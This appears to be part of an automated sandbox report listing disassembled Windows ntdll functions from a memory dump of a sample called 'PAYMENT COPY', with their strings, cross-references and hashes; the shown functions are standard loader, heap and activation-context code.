String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 02fa643d028919ca3ab89d3858cb38a90254162c6b0bc2d1ca4bc254805f73b3
Instruction ID: febb774749692a94c5a525f3c859bf70b4339a61d00207f93c8e12819c5c23ee
Opcode Fuzzy Hash: 02fa643d028919ca3ab89d3858cb38a90254162c6b0bc2d1ca4bc254805f73b3
Instruction Fuzzy Hash: 7792A071608352AFE725DF19C880B6BBBE8BF94758F04491DFA94DB260D770E844CB92

Function 014F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

undeleted critical section in freed memory, xrefs: 0153542B
Address of the debug info found in the active list., xrefs: 015354AE, 015354FA
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015354CE
double initialized or corrupted critical section, xrefs: 01535508
Thread identifier, xrefs: 0153553A
Thread is in a state in which it cannot own a critical section, xrefs: 01535543
Critical section address, xrefs: 01535425, 015354BC, 01535534
Critical section debug info address, xrefs: 0153541F, 0153552E
corrupted critical section, xrefs: 015354C2
8, xrefs: 015352E3
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0153540A, 01535496, 01535519
Critical section address., xrefs: 01535502
Invalid debug info address of this critical section, xrefs: 015354B6
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015354E2

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: c2d5732d283306c824bc5c8d7927f6da8c872551640f095e9892b902643b8c13
Instruction ID: 974de87870f02da5efd38b2eeb5b30f80516d7dd4c3de4eb3f815922e0b34ecc
Opcode Fuzzy Hash: c2d5732d283306c824bc5c8d7927f6da8c872551640f095e9892b902643b8c13
Instruction Fuzzy Hash: FA81A1B0A40349AFDB20CF99C844BAEBBF5FB58704F61411EF505BB290E375A945CB50

Function 014F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01532409
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 015325EB
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01532602
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01532624
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01532412
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 015324C0
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01532506
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 015322E4
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01532498
@, xrefs: 0153259B
RtlpResolveAssemblyStorageMapEntry, xrefs: 0153261F

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: b540691dd16ff598c1d3639fda632fdbdae2220055e406729d5f6d70463f1d15
Instruction ID: 14d71215669331258b5916612ba0450ac61c27ed52914fad204a6c21e59c949a
Opcode Fuzzy Hash: b540691dd16ff598c1d3639fda632fdbdae2220055e406729d5f6d70463f1d15
Instruction Fuzzy Hash: 29027FB1D006299BDB31DB58CC80B9EB7B8BF54304F4041DEA749AB251DB71AE84CF69

Function 01568B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

lsass.exe, xrefs: 01568BA1
DefaultBrowser_NOPUBLISHERID, xrefs: 01568D00
SegmentHeap, xrefs: 01568BE9
smss.exe, xrefs: 01568B8B
services.exe, xrefs: 01568B96
runtimebroker.exe, xrefs: 01568B73
heapType, xrefs: 01568BCB
csrss.exe, xrefs: 01568B80
svchost.exe, xrefs: 01568B68
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01568BD0

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 303f7017e848f5c3ec7a42ff56a78ed44e458c60fe8caecf1feb611c4b20d953
Instruction ID: ba70a6204229f608d1811be649dcdbbc9a8de62a0e2822d22be83fea4379a843
Opcode Fuzzy Hash: 303f7017e848f5c3ec7a42ff56a78ed44e458c60fe8caecf1feb611c4b20d953
Instruction Fuzzy Hash: 9151D1715143019BD725DF19C844BABBBECFFA8244F14491EEA99CB294E770E504CBE2

Function 01570274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0157069F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 015704D3
Just reallocated block at %p to %Ix bytes, xrefs: 015705F1
HEAP[%wZ]: , xrefs: 01570399, 015704A8, 015705D0, 01570675, 015706CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 015706EA
RtlReAllocateHeap, xrefs: 015702BF, 01570362
About to reallocate block at %p to %Ix bytes, xrefs: 015703BA
HEAP: , xrefs: 015703A6, 015704B5, 015705DD, 01570682, 015706D9

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 6a25bbb7cecba6d5ad7e520a5a2d00cd8d37238de17ae0407717be7ee243e523
Instruction ID: 8f0861213ca9feffc574abdd2d0984e694cdc81052c0d9c3c912f951bd7ccc58
Opcode Fuzzy Hash: 6a25bbb7cecba6d5ad7e520a5a2d00cd8d37238de17ae0407717be7ee243e523
Instruction Fuzzy Hash: 84D1DF31500686DFDB22DF69E492AADBBF1FF5A710F18805AF4459F2A2C734D945CB20

Function 015489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

VerifierFlags, xrefs: 01548C50
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01548A3D
HandleTraces, xrefs: 01548C8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01548A67
VerifierDlls, xrefs: 01548CBD
VerifierDebug, xrefs: 01548CA5
AVRF: -*- final list of providers -*- , xrefs: 01548B8F

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 7b936f3e69915dbc116e779433681cab2ff8dbd1e2dd2bfcce6658dd96177f2c
Instruction ID: a7e82dd429723cfadbdb6f0bf388133c4d48af9ffbceea17015d796653ac06c5
Opcode Fuzzy Hash: 7b936f3e69915dbc116e779433681cab2ff8dbd1e2dd2bfcce6658dd96177f2c
Instruction Fuzzy Hash: 12910471A463029FD726DFA9C8C0B5AB7E8BBA4B1CF4A095DFA406F250D7709804CB95

Function 014CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

{, xrefs: 01524643
R, xrefs: 014CEB62
T, xrefs: 014CEB4E
LdrpResSearchResourceInsideDirectory Enter, xrefs: 014CEB58
, xrefs: 014CF299
LdrpResSearchResourceInsideDirectory Exit, xrefs: 014CEB6C

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 1ece68c37cac149ab4d7d34bcb2071a4f67a79d07b25de1df5ecffeec9685615
Instruction ID: 7c8c1f44d347ebfd0190ca43f0bd06730235665559de5719c324382d3c128e28
Opcode Fuzzy Hash: 1ece68c37cac149ab4d7d34bcb2071a4f67a79d07b25de1df5ecffeec9685615
Instruction Fuzzy Hash: 05A25A75A0562A8BDB64CF18C8887ADBBB1BF45704F1442EED50DAB3A0DB349E85CF40

Function 014F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 015340DF, 01534141, 01534205, 0153425F
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 015341FE
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 015340D8
Delaying execution failed with status 0x%08lx, xrefs: 01534258
minkernel\ntdll\ldrinit.c, xrefs: 015340E9, 0153414B, 0153420F, 01534269
Process initialization failed with status 0x%08lx, xrefs: 0153413A

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 1f5a5f8fc125c4d16d1684b420c1271ce4b219b4cab3177616580f3d299a453b
Instruction ID: e29974e6b7042d733f1130023abdf2e24fd71df48fe459f3dcf6c44faee3b6d2
Opcode Fuzzy Hash: 1f5a5f8fc125c4d16d1684b420c1271ce4b219b4cab3177616580f3d299a453b
Instruction Fuzzy Hash: A1914A30B007129BEB35DF58D885BAE7BA1FB90B14F56012EEA107F3A1D7B49802D794

Function 014B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01519A2A
LdrpInitShimEngine, xrefs: 015199F4, 01519A07, 01519A30
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015199ED
apphelp.dll, xrefs: 014B6496
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01519A01
minkernel\ntdll\ldrinit.c, xrefs: 01519A11, 01519A3A

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: aaec46ca2e3df5bf0667d3a83f644ca013b76f5a222cc3b3489837742742ba46
Instruction ID: 360b0fae0babbaf9f7cba18d96bdcf4750a30d5c2deb40bb520fb4361c5d5bf3
Opcode Fuzzy Hash: aaec46ca2e3df5bf0667d3a83f644ca013b76f5a222cc3b3489837742742ba46
Instruction Fuzzy Hash: 8F5134722083009FE721DF24D891FAB77E8FB94648F41091EF5959B1B4D770E908CBA2

Function 014F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 015321BF
RtlGetAssemblyStorageRoot, xrefs: 01532160, 0153219A, 015321BA
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0153219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01532178
SXS: %s() passed the empty activation context, xrefs: 01532165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01532180

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 3f5b443e21b542cfa33aa8c9d8c304856cfcbd7cf22b4640a0ef1ff02a3ebda7
Instruction ID: 3ab5efbe12cbc64aff603f8e93233523e5c2ac90d312d5f072cf2832445efd3f
Opcode Fuzzy Hash: 3f5b443e21b542cfa33aa8c9d8c304856cfcbd7cf22b4640a0ef1ff02a3ebda7
Instruction Fuzzy Hash: 6131E736B4121577F7218A9A8C41F5B7BA8EBE5A50F15405FFB04AB361D3B0DE01C6A1

Function 014FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

LdrpInitializeImportRedirection, xrefs: 01538177, 015381EB
LdrpInitializeProcess, xrefs: 014FC6C4
Loading import redirection DLL: '%wZ', xrefs: 01538170
minkernel\ntdll\ldrredirect.c, xrefs: 01538181, 015381F5
Unable to build import redirection Table, Status = 0x%x, xrefs: 015381E5
minkernel\ntdll\ldrinit.c, xrefs: 014FC6C3

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 2b5e87bad75979e15c52a6cacd86979f7d375d382ef9bbeda931297977c7d299
Instruction ID: d5ac7105cf20097339779ed9b45704d4f480282bff3acbfc194425d935bd0d75
Opcode Fuzzy Hash: 2b5e87bad75979e15c52a6cacd86979f7d375d382ef9bbeda931297977c7d299
Instruction Fuzzy Hash: 3531F3716443069BD224EE29D886E2AB7D5FFE4B10F05061DF9846B3A1E670EC04C7A2

Function 0150096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 01502DF0: LdrInitializeThunk.NTDLL ref: 01502DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01500BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01500BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01500D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01500D74

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: f55ed27156c2a0f55b2b21d335e285d6cb9ef753e566bc6cc9fa185de1999de7
Instruction ID: e1f774478e547c6c52af6320e22cc0a34eb09944adc0888696f0b6109cab4f14
Opcode Fuzzy Hash: f55ed27156c2a0f55b2b21d335e285d6cb9ef753e566bc6cc9fa185de1999de7
Instruction Fuzzy Hash: 6C425DB2900715DFDB21CF68C881BAAB7F4BF44314F1445A9E989EF281D770AA85CF61

Function 014CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 014CA3E7
LdrResFallbackLangList Exit, xrefs: 014CA3FF
LdrResFallbackLangList Enter, xrefs: 014CA3EF
6, xrefs: 014CA3F7

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 93dcc1036e8ff5a40b9142c3cfffce988284515d1a8a7b912db9cffbfd9ccbab
Instruction ID: 7a5e3f715b9999f7a9e81c0883cea9446adbe25bc7803f76358f7770f1b473ae
Opcode Fuzzy Hash: 93dcc1036e8ff5a40b9142c3cfffce988284515d1a8a7b912db9cffbfd9ccbab
Instruction Fuzzy Hash: 6FC1CD7920838ACFD751CF58C144B6AB7E4BF94B04F10896EF9869B3A0E734C946CB56

Function 014F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 014F8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 014F855E
@, xrefs: 014F8591
minkernel\ntdll\ldrinit.c, xrefs: 014F8421

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 9df8565519f22a9e87becca05f77efc81eb64224815259d93457525d64ef3f61
Instruction ID: 1e9f5d2fe5a3e69a200aa7397ddee2938cb0cb3f81ae9146c2a08fad9f163876
Opcode Fuzzy Hash: 9df8565519f22a9e87becca05f77efc81eb64224815259d93457525d64ef3f61
Instruction Fuzzy Hash: A8919271518346AFDB22EF65CC44F6BBBE8BF94754F40092EF6849A261E334D904CB62

Function 014F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 015322B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 015321D9, 015322B1
SXS: %s() passed the empty activation context, xrefs: 015321DE
.Local, xrefs: 014F28D8

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: acf300e23be5e3b3e1264dbb627612dc712842ba26e12f8695f9bd91d9b1d236
Instruction ID: fe89d7de7ac1057577f874df05e6878a7d3b212b15992d07d21c559bbec35b13
Opcode Fuzzy Hash: acf300e23be5e3b3e1264dbb627612dc712842ba26e12f8695f9bd91d9b1d236
Instruction Fuzzy Hash: 20A17E31A012299BDB25CF59CC84F9AB7B5BB58314F1541EEDA08AB361D770DE81CF90

Function 014F4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01533456
SXS: %s() called with invalid flags 0x%08lx, xrefs: 0153342A
SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01533437
RtlDeactivateActivationContext, xrefs: 01533425, 01533432, 01533451

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: ca343511b51754a5e0d6f6cc7e559df20866a8e0e96a5e22328203f483017f9e
Instruction ID: 437b538ddf800e18efa10560ca929ad8174fd98672c558c369aa872fe93acf63
Opcode Fuzzy Hash: ca343511b51754a5e0d6f6cc7e559df20866a8e0e96a5e22328203f483017f9e
Instruction Fuzzy Hash: 1D61F1366007129BD722CF1DC885B2BB7E5BF90B60F59852EEA559F361DB30E801CB91

Function 014C64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01520FE5
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015210AE
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01521028
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0152106B

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 2333356109ddd8480d528e2e80766c9a0c06c76079acce035bcdce7c45d97a25
Instruction ID: 74e14f16339761e042c8208859b3e2b2afc47a2b1fec3fb9dcb2a6f88ef19a41
Opcode Fuzzy Hash: 2333356109ddd8480d528e2e80766c9a0c06c76079acce035bcdce7c45d97a25
Instruction Fuzzy Hash: E771DF759043069FCB61DF18C884F9B7BA8AFA5B54F10446AF9488F29AD334D189CBD1

Function 014E245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0152A992
LdrpDynamicShimModule, xrefs: 0152A998
apphelp.dll, xrefs: 014E2462
minkernel\ntdll\ldrinit.c, xrefs: 0152A9A2

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 0865c5684faba8a8c472d1daae6c5f212d439760ff0d8b21d0485414397be115
Instruction ID: 50a129da90bb567a371c2f39b95e85b2d59f34ed125e3f8e0cbd371800f5acc7
Opcode Fuzzy Hash: 0865c5684faba8a8c472d1daae6c5f212d439760ff0d8b21d0485414397be115
Instruction Fuzzy Hash: EF314872A00212ABDB719F5A98C5E6E77F5FB85B00F17002EF9106F2A5D7B05946D740

Function 014D29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 014D327D
HEAP[%wZ]: , xrefs: 014D3255
HEAP: , xrefs: 014D3264

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 86668dadf48025ef51a2c76ed221597c69997768b9135f0034cc2a0cdfb7a18f
Instruction ID: 2c9677ba4c2dd2890ab35f17918c4c5098c089daa411d196d4ad6cc17451fb1f
Opcode Fuzzy Hash: 86668dadf48025ef51a2c76ed221597c69997768b9135f0034cc2a0cdfb7a18f
Instruction Fuzzy Hash: F892BC71A042499FDF25CF68C460BAEBBF1FF48310F18809AE859AB361D774A946CF51

Function 014D0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

(UCRBlock->Size >= *Size), xrefs: 015250CA
HEAP[%wZ]: , xrefs: 015250AE
HEAP: , xrefs: 015250BD

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 686548eaf4157402a2b85578fb72bfd0aeba4758c4e77c58185e816fbf42c839
Instruction ID: cabffafc750c9d35ef2fb50bfd754ba90235aeab9a6e6c4d58e103335c347fc5
Opcode Fuzzy Hash: 686548eaf4157402a2b85578fb72bfd0aeba4758c4e77c58185e816fbf42c839
Instruction Fuzzy Hash: DEF1BD31A00606DFEB25CF68C8A4BAAB7F5FF45300F1441AAF5569B3A1D734E981CB91

Function 014E6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

@, xrefs: 014E6C24
, xrefs: 0152CA51

Memory Dump Source

Source File: 00000009.00000002.2685474878.0000000001490000.00000040.00001000.00020000.00000000.sdmp, Offset: 01490000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1490000_PAYMENT COPY.jbxd

Similarity

API ID:
String ID: $@
API String ID: 0-1077428164
Opcode ID: 92fe093d8e3768adb811f266e3bbde47c1fe922b62cd164e27a89e3a177bc1f9
Instruction ID: 92d4d6acc26f082176f73ff445691a3117fc41674febf31ff95634f45ba02fbd
Opcode Fuzzy Hash: 92fe093d8e3768adb811f266e3bbde47c1fe922b62cd164e27a89e3a177bc1f9
Instruction Fuzzy Hash: E9C2A0726083519FEB25CF28C844BAFBBE5BF89715F04892EE98987351D734D805CB92

Function 014BA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 014BA1C1
\??\, xrefs: 0151C1E4
